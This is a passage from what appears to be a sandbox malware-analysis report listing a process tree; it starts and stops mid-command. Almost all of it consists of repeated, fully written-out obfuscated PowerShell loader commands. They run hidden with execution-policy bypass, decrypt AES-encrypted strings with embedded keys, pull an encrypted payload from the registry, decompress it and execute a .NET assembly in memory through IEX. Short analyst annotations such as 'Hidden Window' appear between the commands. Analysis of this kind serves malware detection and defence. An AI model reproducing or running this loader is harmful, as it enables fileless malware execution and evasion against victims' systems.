-join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        15⤵
        
        PID:6224
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1372" "3020" "2948" "3024" "0" "0" "3028" "0" "0" "0" "0" "0"
        15⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5200
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6732).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        14⤵
        
        PID:4880
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6732).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        14⤵
        Hide Artifacts: Hidden Window
        
        PID:5680
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6732" "3004" "2928" "3008" "0" "0" "3012" "0" "0" "0" "0" "0"
        14⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:1936
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2848).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = 